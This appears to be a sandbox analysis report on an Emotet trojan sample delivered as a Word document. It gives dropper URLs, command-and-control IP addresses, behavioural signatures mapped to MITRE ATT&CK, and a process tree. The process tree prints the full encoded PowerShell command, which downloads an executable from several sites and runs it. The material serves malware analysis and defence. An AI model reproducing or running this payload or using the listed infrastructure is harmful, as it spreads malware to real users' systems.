emotet | 23419c0a7cc778b60899d25977c95f7291915539f5f9bb85c5ce3bfe11c77e9b

General

Target

Docs_b147ef181809997d173ebc4242d4a74d.34.doc
Sample

191209-s3x1gt346x
SHA256

23419c0a7cc778b60899d25977c95f7291915539f5f9bb85c5ce3bfe11c77e9b

Score

10^/10

trojan banker emotet evasion

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://www.aitb66.com/wp-admin/wdm12182/

exe.dropper

http://zisoft.zinad.net/wp-content/7flgzi080/

exe.dropper

http://ausflugemarrakesh.com/cgi-bin/512/

exe.dropper

http://axis-gps.com/pzdjz/hgpu56/

exe.dropper

https://xploremotions.com/rtrx/c656/

Extracted

Family

emotet

C2

76.221.133.146:80

104.33.129.244:80

172.90.70.168:8080

96.126.121.64:443

104.236.137.72:8080

172.104.233.225:8080

85.234.143.94:8080

50.28.51.143:8080

190.186.164.23:80

47.146.42.234:80

63.246.252.234:80

80.29.54.20:80

68.183.190.199:8080

46.28.111.142:7080

183.82.97.25:80

87.106.46.107:8080

188.216.24.204:80

186.68.48.204:443

181.198.203.45:443

88.250.223.190:8080

rsa_pubkey.plain

Signatures

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

Powershell.exe

description pid process

Token: SeDebugPrivilege 4664 Powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

Powershell.execorssensor.exe

pid process

4664 Powershell.exe
688 corssensor.exe
Suspicious behavior: EmotetMutantsSpam 2 IoCs

Processes:

377.execorssensor.exe

pid process

4312 377.exe
688 corssensor.exe
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

WINWORD.EXE377.exe377.execorssensor.execorssensor.exe

pid process

4944 WINWORD.EXE
3872 377.exe
4312 377.exe
4816 corssensor.exe
688 corssensor.exe

description	pid	process
Token: SeDebugPrivilege	4664	Powershell.exe

pid	process
4664	Powershell.exe
688	corssensor.exe

pid	process
4312	377.exe
688	corssensor.exe

pid	process
4944	WINWORD.EXE
3872	377.exe
4312	377.exe
4816	corssensor.exe
688	corssensor.exe

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

description	ioc
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName

Emotet
Emotet is a trojan that is primarily spread through spam emails
trojan banker emotet
Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\Debug\ESE.TXT svchost.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	svchost.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

description	ioc
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1"
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0"

Executes dropped EXE 4 IoCs

Processes:

377.exe377.execorssensor.execorssensor.exe

pid process

3872 377.exe
4312 377.exe
4816 corssensor.exe
688 corssensor.exe

pid	process
3872	377.exe
4312	377.exe
4816	corssensor.exe
688	corssensor.exe

Drops file in System32 directory 6 IoCs

Processes:

corssensor.exe377.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	corssensor.exe
File renamed	C:\Users\Admin\377.exe => C:\Windows\SysWOW64\corssensor.exe	377.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	corssensor.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	corssensor.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	corssensor.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	corssensor.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

SppExtComObj.exePowershell.exe377.execorssensor.exe

description	pid	process	target process
PID 4412 wrote to memory of 4536	4412	SppExtComObj.exe	SLUI.exe
PID 4664 wrote to memory of 3872	4664	Powershell.exe	377.exe
PID 3872 wrote to memory of 4312	3872	377.exe	377.exe
PID 4816 wrote to memory of 688	4816	corssensor.exe	corssensor.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

WINWORD.EXE

pid process

4944 WINWORD.EXE

pid	process
4944	WINWORD.EXE

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

description	ioc
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

description	ioc
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

4944 WINWORD.EXE

pid	process
4944	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_b147ef181809997d173ebc4242d4a74d.34.doc" /o ""
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
PID:4944

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:4412

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
2⤵
PID:4536

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABSAGIAcgBtAHcAbABxAHkAaAByAD0AJwBSAHEAZAB6AHEAcgBtAHQAcwB4ACcAOwAkAE8AZABrAHUAZwBtAHIAagBnAGIAIAA9ACAAJwAzADcANwAnADsAJABOAHgAbABrAGMAZQBiAGYAYgBhAHoAPQAnAEQAbAByAGgAYwB3AHQAYQBjAHAAJwA7ACQARAB1AGsAcgBhAHkAeQBhAHgAaAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATwBkAGsAdQBnAG0AcgBqAGcAYgArACcALgBlAHgAZQAnADsAJABUAHAAcAB2AHEAdQByAHAAegBqAG8AZQA9ACcATgBpAGYAcABwAGQAcgBlAG8AJwA7ACQAUQBwAHkAeQBsAHEAaAB6AHoAdgBrAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABOAEUAVAAuAFcARQBCAGMAbABpAGUATgB0ADsAJABPAHoAdQBkAG4AZQBjAGkAZQB5AG8APQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBhAGkAdABiADYANgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdwBkAG0AMQAyADEAOAAyAC8AKgBoAHQAdABwADoALwAvAHoAaQBzAG8AZgB0AC4AegBpAG4AYQBkAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ANwBmAGwAZwB6AGkAMAA4ADAALwAqAGgAdAB0AHAAOgAvAC8AYQB1AHMAZgBsAHUAZwBlAG0AYQByAHIAYQBrAGUAcwBoAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ANQAxADIALwAqAGgAdAB0AHAAOgAvAC8AYQB4AGkAcwAtAGcAcABzAC4AYwBvAG0ALwBwAHoAZABqAHoALwBoAGcAcAB1ADUANgAvACoAaAB0AHQAcABzADoALwAvAHgAcABsAG8AcgBlAG0AbwB0AGkAbwBuAHMALgBjAG8AbQAvAHIAdAByAHgALwBjADYANQA2AC8AJwAuACIAUwBgAHAATABpAHQAIgAoACcAKgAnACkAOwAkAEsAdQBuAGkAbgBrAGgAYwA9ACcAUABtAGsAbABmAGgAcwBtAHQAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgB5AGgAeQBlAHgAaABkAHgAYgAgAGkAbgAgACQATwB6AHUAZABuAGUAYwBpAGUAeQBvACkAewB0AHIAeQB7ACQAUQBwAHkAeQBsAHEAaAB6AHoAdgBrAC4AIgBkAE8AdwBuAEwAYABPAGAAQQBkAEYAaQBMAGUAIgAoACQAQgB5AGgAeQBlAHgAaABkAHgAYgAsACAAJABEAHUAawByAGEAeQB5AGEAeABoACkAOwAkAFgAagBsAHYAbQBhAGYAYQBwAGIAcABzAD0AJwBFAGcAbQB6AGgAYwB3AHcAeAB2AHUAZQBqACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQARAB1AGsAcgBhAHkAeQBhAHgAaAApAC4AIgBsAGUATgBgAGcAdABoACIAIAAtAGcAZQAgADMANgA5ADEAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAFIAVAAiACgAJABEAHUAawByAGEAeQB5AGEAeABoACkAOwAkAFUAZABwAHIAeABkAHgAcwB4AGgAdwBzAD0AJwBYAHIAZgBnAGQAbABhAHUAcABrAHgAJwA7AGIAcgBlAGEAawA7ACQAUABhAGkAcQBqAGEAeABnAGwAYwA9ACcAQQBqAHUAYgBhAGYAZABjACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEQAegBkAHMAbwByAHoAbwBmAHQAdwBzAGkAPQAnAFEAbgByAHcAaABsAG8AcQBkAGMAYgAnAA==
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4664

C:\Users\Admin\377.exe
"C:\Users\Admin\377.exe"
2⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3872

C:\Users\Admin\377.exe
--11945cd1
3⤵
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Drops file in System32 directory
PID:4312

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Drops file in Windows directory
PID:3680

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:3988

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
1⤵
PID:4864

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup
1⤵
PID:4844

C:\Windows\SysWOW64\corssensor.exe
"C:\Windows\SysWOW64\corssensor.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4816

C:\Windows\SysWOW64\corssensor.exe
--bdcecf59
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Drops file in System32 directory
PID:688

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
1⤵
PID:4956

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Disabling Security Tools

Modify Registry

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\377.exe

Download Submit
C:\Users\Admin\377.exe

Download Submit
C:\Users\Admin\377.exe

Download Submit
C:\Windows\SysWOW64\corssensor.exe

Download Submit
C:\Windows\SysWOW64\corssensor.exe

Download Submit
memory/688-26-0x0000000000D30000-0x0000000000D47000-memory.dmp

Filesize
92KB

Download
memory/688-27-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3872-8-0x0000000002240000-0x0000000002257000-memory.dmp

Filesize
92KB

Download
memory/4312-10-0x0000000002270000-0x0000000002287000-memory.dmp

Filesize
92KB

Download
memory/4312-11-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/4816-24-0x0000000000E20000-0x0000000000E37000-memory.dmp

Filesize
92KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads